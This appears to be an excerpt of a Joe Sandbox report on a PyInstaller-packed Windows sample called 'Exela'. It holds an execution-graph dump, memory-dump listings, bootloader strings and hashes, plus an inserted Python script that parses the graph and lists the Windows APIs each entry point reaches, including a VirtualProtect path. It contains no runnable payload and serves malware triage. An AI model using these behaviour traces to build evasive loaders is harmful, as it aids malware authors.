7ff75aea04a2 10136->10138 10139 7ff75aea0465 10136->10139 10137->10066 10142 7ff75aea01ac 10138->10142 10141 7ff75aea047a _invalid_parameter_noinfo 10139->10141 10141->10137 10143 7ff75aea01f5 10142->10143 10146 7ff75aea01db 10142->10146 10143->10137 10144 7ff75aea01f0 _invalid_parameter_noinfo 10144->10143 10146->10143 10148 7ff75aea01e5 10146->10148 10149 7ff75aea02e1 _invalid_parameter_noinfo 10146->10149 10150 7ff75aeabacc 10146->10150 10176 7ff75aeabf1c 10146->10176 10148->10144 10149->10146 10151 7ff75aeabaf4 10150->10151 10152 7ff75aeabb0d 10150->10152 10151->10146 10152->10151 10154 7ff75aeabb61 10152->10154 10155 7ff75aeabb92 10152->10155 10153 7ff75aeabef9 _invalid_parameter_noinfo 10153->10151 10154->10153 10156 7ff75aeabbb9 10155->10156 10157 7ff75aeabbf3 10155->10157 10160 7ff75aeabbc6 10155->10160 10156->10160 10164 7ff75aeabbe2 10156->10164 10182 7ff75aead66c 10157->10182 10159 7ff75aeabc04 10161 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10159->10161 10162 7ff75aeabbd2 _invalid_parameter_noinfo 10160->10162 10163 7ff75aeabc0e 10161->10163 10175 7ff75aeabc1d 10162->10175 10166 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10163->10166 10165 7ff75aeabd8e 10164->10165 10168 7ff75aeabd21 GetConsoleMode 10164->10168 10164->10175 10167 7ff75aeabd93 ReadFile 10165->10167 10166->10164 10169 7ff75aeabdb9 10167->10169 10170 7ff75aeabead GetLastError 10167->10170 10168->10165 10171 7ff75aeabd35 10168->10171 10169->10170 10169->10175 10170->10175 10171->10167 10173 7ff75aeabd3f ReadConsoleW 10171->10173 10172 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10172->10151 10174 7ff75aeabd63 GetLastError 10173->10174 10173->10175 10174->10175 10175->10172 10177 7ff75aeabf39 10176->10177 10179 7ff75aeabf64 10176->10179 10178 7ff75aeabf3e _invalid_parameter_noinfo 10177->10178 10181 7ff75aeabf49 10178->10181 10179->10181 10186 7ff75aeab9ac 10179->10186 10181->10146 10183 7ff75aead67b 10182->10183 10185 7ff75aead6b5 10182->10185 10184 7ff75aead69e HeapAlloc 10183->10184 
10183->10185 10184->10183 10184->10185 10185->10159 10187 7ff75aeaba06 10186->10187 10192 7ff75aeab9d6 10186->10192 10188 7ff75aeaba7b 10187->10188 10191 7ff75aeaba1f 10187->10191 10190 7ff75aeabacc _fread_nolock 10 API calls 10188->10190 10188->10192 10189 7ff75aeaba32 _invalid_parameter_noinfo 10189->10192 10190->10192 10191->10189 10192->10181 10467 7ffb080324c0 10469 7ffb080324e6 10467->10469 10468 7ffb08032555 10469->10468 10471 7ffb08032610 10469->10471 10472 7ffb08032621 10471->10472 10473 7ffb08033f11 00007FFB02E0767C 10472->10473 10474 7ffb0803266a 10472->10474 10474->10468 10550 7ffb08032a40 10551 7ffb08032a5c 10550->10551 10552 7ffb08032a61 10550->10552 10554 7ffb08032bfc 10551->10554 10555 7ffb08032c1f GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 10554->10555 10556 7ffb08032c93 10554->10556 10555->10556 10556->10552 10594 7ffb08031000 10595 7ffb0803101d 10594->10595 10598 7ffb08033578 10594->10598 10595->10598 10599 7ffb08031090 10595->10599 10597 7ffb08031077 10598->10598 10600 7ffb080311ae 10599->10600 10601 7ffb080310b3 10599->10601 10600->10597 10602 7ffb080311d0 5 API calls 10601->10602 10603 7ffb080310cb 10601->10603 10602->10603 10604 7ffb08031118 10603->10604 10605 7ffb08031107 10603->10605 10608 7ffb080336c8 10603->10608 10618 7ffb08031880 10603->10618 10604->10597 10610 7ffb080311d0 10605->10610 10609 7ffb08031880 3 API calls 10608->10609 10609->10604 10611 7ffb08031880 3 API calls 10610->10611 10617 7ffb080311f8 10611->10617 10612 7ffb08033862 10613 7ffb0803135a 00007FFB02E0767C 10614 7ffb08032700 IsProcessorFeaturePresent 10613->10614 10615 7ffb0803137e 10614->10615 10615->10604 10616 7ffb0803152c 00007FFB02E0767C 10616->10617 10617->10612 10617->10613 10617->10616 10623 7ffb080318bf 10618->10623 10619 7ffb08031b17 00007FFB02E0767C 10620 7ffb08033a5e 10619->10620 10619->10623 10620->10603 10621 7ffb08031d75 10621->10603 10622 7ffb08033a4d 00007FFB02E0767C 10622->10620 10623->10619 10623->10621 
10623->10622 10624 7ffb08031c3d 10623->10624 10627 7ffb08033a0e 10623->10627 10625 7ffb08032700 IsProcessorFeaturePresent 10624->10625 10626 7ffb08031c70 10625->10626 10626->10603 10627->10622 10202 7ff75aea5698 10203 7ff75aea56cf 10202->10203 10206 7ff75aea56b2 10202->10206 10204 7ff75aea56e2 CreateFileW 10203->10204 10203->10206 10205 7ff75aea5716 10204->10205 10210 7ff75aea574c 10204->10210 10208 7ff75aea5741 CloseHandle 10205->10208 10209 7ff75aea572b CloseHandle 10205->10209 10207 7ff75aea56bf _invalid_parameter_noinfo 10206->10207 10207->10210 10208->10210 10209->10210 10475 7ff75aeb93d8 10476 7ff75aeb93f6 10475->10476 10477 7ff75aeb940a 10475->10477 10476->10477 10478 7ff75aeb93fb _set_statfp 10476->10478 10479 7ff75aeb9425 10477->10479 10480 7ff75aeb941b _set_statfp 10477->10480 10482 7ff75aeb945e 10478->10482 10481 7ff75aeb9432 _set_statfp 10479->10481 10484 7ff75aeb9441 10479->10484 10480->10482 10481->10482 10483 7ff75aeb947b 10482->10483 10485 7ff75aeb946e _set_statfp 10482->10485 10484->10482 10486 7ff75aeb9454 _set_statfp 10484->10486 10485->10483 10486->10482 10487 7ff75aea83d8 10488 7ff75aea83f7 10487->10488 10490 7ff75aea840a 10487->10490 10489 7ff75aea83fc _invalid_parameter_noinfo 10488->10489 10489->10490
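The execution_graph text above is the serialised form of the interactive graph widget: each node is a numeric id followed by its start address, optional API or function labels, an optional "N API calls" summary for callees, and id->id edges. As an added example (not part of the Joe Sandbox report), the following Python parses that format, finds the root nodes and lists which Windows APIs each root reaches, which is the quickest way to see, for instance, that the 7ffb084a3230 path resolves an import with LoadLibraryA/GetProcAddress and then calls VirtualProtect twice. The excerpt embedded as input is copied from the graph above; the is_win_api heuristic (CamelCase name, no leading underscore) is an assumption for separating imported APIs from CRT-internal labels such as __free_lconv_mon.

```python
import re
from collections import defaultdict, deque

NODE_ID = re.compile(r"^\d{1,6}$")
ADDR = re.compile(r"^[0-9A-Fa-f]{12,16}$")
EDGE = re.compile(r"^(\d+)->(\d+)$")


def parse_execution_graph(text):
    """Return (nodes, edges): nodes id -> {addr, labels, summary}; edges id -> set(id)."""
    toks = text.split()
    nodes, edges, cur, i = {}, defaultdict(set), None, 0
    while i < len(toks):
        t = toks[i]
        m = EDGE.match(t)
        if m:                                           # "10028->10029"
            edges[int(m.group(1))].add(int(m.group(2)))
            i += 1
        elif NODE_ID.match(t) and i + 1 < len(toks) and ADDR.match(toks[i + 1]):
            cur = int(t)                                # "10030 7ff75aea99fd" starts a node
            nodes[cur] = {"addr": int(toks[i + 1], 16), "labels": [], "summary": None}
            i += 2
        elif NODE_ID.match(t) and toks[i + 1:i + 3] == ["API", "calls"]:
            nodes[cur]["summary"] = f"{t} API calls"    # "2 API calls" (callee summary)
            i += 3
        elif t == "execution_graph" or cur is None:
            i += 1
        else:
            nodes[cur]["labels"].append(t)              # API name, CRT symbol or call target
            i += 1
    return nodes, edges


def is_win_api(label):
    # Assumption: imported Win32 APIs are CamelCase; CRT internals start with '_' or are lowercase.
    return label[:1].isupper() and not ADDR.match(label)


def roots(nodes, edges):
    """Nodes with no incoming edge: the entry points the sandbox saw executing."""
    targets = {d for ds in edges.values() for d in ds}
    return sorted(n for n in nodes if n not in targets)


def reachable(edges, root):
    seen, todo = {root}, deque([root])
    while todo:
        n = todo.popleft()
        for d in edges.get(n, ()):
            if d not in seen:
                seen.add(d)
                todo.append(d)
    return seen


def apis_from(nodes, edges, root):
    """Sorted set of Win32 APIs labelled on any node reachable from root."""
    out = set()
    for n in reachable(edges, root):
        out.update(l for l in nodes.get(n, {"labels": []})["labels"] if is_win_api(l))
    return sorted(out)


# Excerpt copied verbatim from the execution_graph above (four roots).
EXCERPT = (
    "execution_graph 10028 7ff75aea99d1 10029 7ff75aea99d6 10028->10029 10030 7ff75aea99fd "
    "GetModuleHandleW 10029->10030 10031 7ff75aea9a47 10029->10031 10030->10031 10032 "
    "7ff75aea9a0a 10030->10032 10032->10031 10491 7ff75aead3d0 10492 7ff75aead3e6 "
    "10491->10492 10495 7ff75aead3e2 10491->10495 10493 7ff75aead409 SetFilePointerEx "
    "10492->10493 10492->10495 10494 7ff75aead423 GetFileSizeEx 10493->10494 10493->10495 "
    "10494->10495 10363 7ffb084a3230 10364 7ffb084a3dd1 10363->10364 10371 7ffb084a3248 "
    "10363->10371 10365 7ffb084a3cde LoadLibraryA 10366 7ffb084a3cf8 10365->10366 10369 "
    "7ffb084a3d17 GetProcAddress 10366->10369 10366->10371 10368 7ffb084a3d39 VirtualProtect "
    "VirtualProtect 10368->10364 10369->10366 10370 7ffb084a3d2e 10369->10370 10371->10365 "
    "10371->10368 10496 7ff75aeaf3c8 10497 7ff75aeaf3e5 10496->10497 10500 7ff75aeaf408 "
    "10497->10500 10499 7ff75aeaf3ee 10501 7ff75aeaf434 10500->10501 10502 7ff75aeaf458 "
    "10501->10502 10503 7ff75aeaec08 HeapAlloc 10501->10503 10502->10499 10504 7ff75aeaf48b "
    "10503->10504 10505 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10504->10505 10505->10502"
)

if __name__ == "__main__":
    nodes, edges = parse_execution_graph(EXCERPT)
    for r in roots(nodes, edges):
        print(f"{r} @ {nodes[r]['addr']:x}: {', '.join(apis_from(nodes, edges, r)) or '-'}")
```

Run against the full graph text rather than the excerpt, the same functions give one line per root with its transitive API set, which is easier to triage than the node dump (for example, the root at 7ff75ae9ccac reaching CreateProcessW, WaitForSingleObject and TerminateProcess).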

Control-flow Graph
Strings
Memory Dump Source
• Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: ErrorFileLastModuleName
• String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
• API String ID: 2776309574-4232158417

Control-flow Graph
APIs
Memory Dump Source
• Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
APIs
Memory Dump Source
• Source File: 0000004D.00000002.2098176048.00007FFB084A3000.00000080.00000001.01000000.00000019.sdmp, Offset: 00007FFB08150000, based on PE: true
• Associated: 0000004D.00000002.2097383828.00007FFB08150000.00000002.00000001.01000000.00000019.sdmp
• Associated: 0000004D.00000002.2097411781.00007FFB08151000.00000040.00000001.01000000.00000019.sdmp
• Associated: 0000004D.00000002.2097411781.00007FFB0815D000.00000040.00000001.01000000.00000019.sdmp
• Associated: 0000004D.00000002.2097411781.00007FFB081B5000.00000040.00000001.01000000.00000019.sdmp
• Associated: 0000004D.00000002.2097411781.00007FFB081C9000.00000040.00000001.01000000.00000019.sdmp
• Associated: 0000004D.00000002.2097411781.00007FFB081D9000.00000040.00000001.01000000.00000019.sdmp
• Associated: 0000004D.00000002.2097411781.00007FFB081ED000.00000040.00000001.01000000.00000019.sdmp
• Associated: 0000004D.00000002.2097411781.00007FFB0839C000.00000040.00000001.01000000.00000019.sdmp
• Associated: 0000004D.00000002.2097411781.00007FFB0839E000.00000040.00000001.01000000.00000019.sdmp
• Associated: 0000004D.00000002.2097411781.00007FFB083C9000.00000040.00000001.01000000.00000019.sdmp
• Associated: 0000004D.00000002.2097411781.00007FFB083FA000.00000040.00000001.01000000.00000019.sdmp
• Associated: 0000004D.00000002.2097411781.00007FFB08420000.00000040.00000001.01000000.00000019.sdmp
• Associated: 0000004D.00000002.2097411781.00007FFB0846E000.00000040.00000001.01000000.00000019.sdmp
• Associated: 0000004D.00000002.2097411781.00007FFB08474000.00000040.00000001.01000000.00000019.sdmp
• Associated: 0000004D.00000002.2097411781.00007FFB08476000.00000040.00000001.01000000.00000019.sdmp
• Associated: 0000004D.00000002.2097411781.00007FFB08492000.00000040.00000001.01000000.00000019.sdmp
• Associated: 0000004D.00000002.2097411781.00007FFB0849F000.00000040.00000001.01000000.00000019.sdmp
• Associated: 0000004D.00000002.2098205851.00007FFB084A4000.00000004.00000001.01000000.00000019.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_77_2_7ffb08150000_Exela.jbxd
Similarity
• API ID: ProtectVirtual$AddressLibraryLoadProc
• String ID:
• API String ID: 3300690313-0
APIs
Memory Dump Source
• Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0

Control-flow Graph
APIs
  • Part of subcall function 00007FF75AE97F80: _fread_nolock.LIBCMT ref: 00007FF75AE9802A
• _fread_nolock.LIBCMT ref: 00007FF75AE91A1B
  • Part of subcall function 00007FF75AE92910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF75AE91B6A), ref: 00007FF75AE9295E
Strings
Memory Dump Source
• Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
Similarity
• API ID: _fread_nolock$CurrentProcess
• String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
• API String ID: 2397952137-3497178890

Control-flow Graph

Strings
Memory Dump Source
• Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
                                                                                                    • Opcode Fuzzy Hash: 42b8736eca5e8aaffec84b6365213ab165e73849c65a2b46650c6e074acc8ace
                                                                                                    • Instruction Fuzzy Hash: 79417321A087669AFB10FB2198469B9E390FF44794FCC4572EE5D07B95DE3CE5418720

                                                                                                    Control-flow Graph

Strings
Memory Dump Source
• Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: CurrentProcess
• String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
• API String ID: 2050909247-2813020118
• Opcode ID: 619b1d8a1a59d0c7b8dcbaa9966dc471b2ceb069a6157a385d228633a1f186c8
• Instruction ID: 18baeaa694f97a44c889729e513fec92477014abfdaf4d8995048c13593bb700
• Opcode Fuzzy Hash: 619b1d8a1a59d0c7b8dcbaa9966dc471b2ceb069a6157a385d228633a1f186c8
• Instruction Fuzzy Hash: 2D51B322A0876249FA60BB11A8427BAE2D1BF85794FCC4275EE4D477D5EF3CE905C720

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32(?,00007FF75AE93804), ref: 00007FF75AE936E1
• GetLastError.KERNEL32(?,00007FF75AE93804), ref: 00007FF75AE936EB
  • Part of subcall function 00007FF75AE92C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF75AE93706,?,00007FF75AE93804), ref: 00007FF75AE92C9E
  • Part of subcall function 00007FF75AE92C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF75AE93706,?,00007FF75AE93804), ref: 00007FF75AE92D63
  • Part of subcall function 00007FF75AE92C50: MessageBoxW.USER32 ref: 00007FF75AE92D99
Strings
Memory Dump Source
• Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
• String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
• API String ID: 3187769757-2863816727
• Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
• Instruction ID: f76858c276dbdf7e7f1cb10ce940f0214e8e4bf1483fa9fa06be43151ebf1972
• Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
• Instruction Fuzzy Hash: 7521C751B1C76395FA20B724E8177BAA250BF88744FC842B6E55DC25E5EE3CE905C320

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: ba46bac31fe72f1dd681b3566344db0dd8f54c3f22ac6e326a6392c95ac81308
• Instruction ID: ac07e26ee97088d2eaade3e0b7c6704b1d9fdec79bbd64e4776d29d5b95a4315
• Opcode Fuzzy Hash: ba46bac31fe72f1dd681b3566344db0dd8f54c3f22ac6e326a6392c95ac81308
• Instruction Fuzzy Hash: BDC1B4229087A691F760BB15944A2BDB794FF81B80FDD41B1EA4E07791CF7CEC558720

Control-flow Graph

Strings
Memory Dump Source
• Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
• API String ID: 2050909247-2434346643
• Opcode ID: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
• Instruction ID: 42dc910226e0dc196919365218f4cb73e4c3f8ff7adc36aeca7154002c201508
• Opcode Fuzzy Hash: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
• Instruction Fuzzy Hash: 27419231A1C79795FA11FB60E4566E9A310FF88384FC80172EA5C53296EF3CE905C760

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: CloseCreateFileHandle_invalid_parameter_noinfo
• String ID:
• API String ID: 1279662727-0
• Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
• Instruction ID: 1b27b1b376e12331efcd963d3d0276092d520de5a1136c021d3708d197bb6d75
• Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
• Instruction Fuzzy Hash: E341C422D1879283F350BB20961A379A360FF94764F549375EA9C03AD2DF7CA5E18720

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
• String ID:
• API String ID: 3251591375-0
• Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
• Instruction ID: 44aaf1e4e1737e217bb3da66a54c00683d13b118261384aea55578a273af45da
• Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
• Instruction Fuzzy Hash: CD313B21E083734DFA64BB259467BB9A791AF81384FCC44B4D94E672D3DE2CA805C271

Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                    • Instruction ID: d606099b4e6e67df70ef816ca1599a51ed9bd395bbdcec814ad5e0d787070884
                                                                                                    • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                    • Instruction Fuzzy Hash: 35512821B0926246F766BE29940A67AE3C1AF44BA4F9C4774DE6D077C6CF3CD5018630
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 2976181284-0
                                                                                                    • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                    • Instruction ID: 6d79647a6174d8ed0cfcc5369f20650a4ce3914ca626938b546aec1e19bdeabb
                                                                                                    • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                    • Instruction Fuzzy Hash: 2C110461718B6181EA10BB65A809069A361FF81BF4F9C4371EE7D4B7D8CE3CD4018700
                                                                                                    APIs
                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,00007FF75AEB2D92,?,?,?,00007FF75AEB2DCF,?,?,00000000,00007FF75AEB3295,?,?,?,00007FF75AEB31C7), ref: 00007FF75AEAA9CE
                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF75AEB2D92,?,?,?,00007FF75AEB2DCF,?,?,00000000,00007FF75AEB3295,?,?,?,00007FF75AEB31C7), ref: 00007FF75AEAA9D8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmp
